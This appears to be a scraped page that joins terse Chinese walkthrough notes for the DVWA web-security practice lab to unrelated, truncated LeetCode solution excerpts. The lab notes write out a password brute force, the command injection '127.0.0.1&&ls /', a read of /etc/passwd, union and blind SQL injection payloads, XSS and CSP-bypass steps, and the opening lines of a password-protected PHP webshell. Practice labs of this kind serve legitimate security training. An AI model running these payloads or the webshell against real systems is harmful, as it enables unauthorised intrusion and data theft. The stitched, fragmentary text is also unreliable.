burp抓包->傳送到intruder->猜測使用者名為admin->用字典爆破
得到密碼password
輸入127.0.0.1&&ls /
輸入etc/passwd
得到
root: x:0:0:root:/root:/bin/bash daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin然後不會了。。
<?php
$password='myhack58';//登入密碼(支援菜刀)
//----------功能程式------------------//
依次輸入
1』 union select 1,database()#
1』 union select 1,group_concat(table_name) from information_schema.tables where table_schema=『dvwa』#
得到表名 guestbook,users
1.輸入1』 and length(database())>4#提示不存在
輸入1』 and length(database())>3#存在,所以資料庫名的長度為4
2.然後用1』 and ascii(substr(database(),n,1))>100#來獲得資料庫名
3.最後得到資料庫名為dvwa
檢視源**發現上述位置可以進行xss攻擊
訪問 即可
輸入直接輸入
檢視源**
content-security-policy: script-src 'self' example.com code.jquery.com ;
發現可以載入中的script
去發布alert(1)
在輸入框中填入/raw/hllrvw2f
成功彈出乙個對話方塊
提交success發現提示錯誤的token
看源**發現token是在前台生成的所以只要輸入success在執行一次generate_token()就可以了
難度等級簡單
第一題 1 給定乙個整數陣列 nums 和乙個目標值 target,請你在該陣列中找出和為目標值的那 兩個 整數,並返回他們的陣列下標。你可以假設每種輸入只會對應乙個答案。但是,你不能重複利用這個陣列中同樣的yuansu class solution object def two sum self,...
LeetCode簡單難度題解 二
給定乙個排序陣列和乙個目標值,在陣列中找到目標值,並返回其索引。如果目標值不存在於陣列中,返回它將會被按順序插入的位置。你可以假設陣列中無重複元素。題解 迴圈陣列 從後往前找,當匹配到第乙個比目標值小的那個元素下標的時候 返回下標 1就是目標值要插入的位置,如果有正好匹配的值 直接返回下標 publ...
力扣題解 簡單難度
不定時更新 給定乙個整數陣列 nums 和乙個整數目標值 target,請你在該陣列中找出 和為目標值 的那 兩個 整數,並返回它們的陣列下標。你可以假設每種輸入只會對應乙個答案。但是,陣列中同乙個元素不能使用兩遍。你可以按任意順序返回答案。我的解答 時間複雜度為o n 2 def twosum s...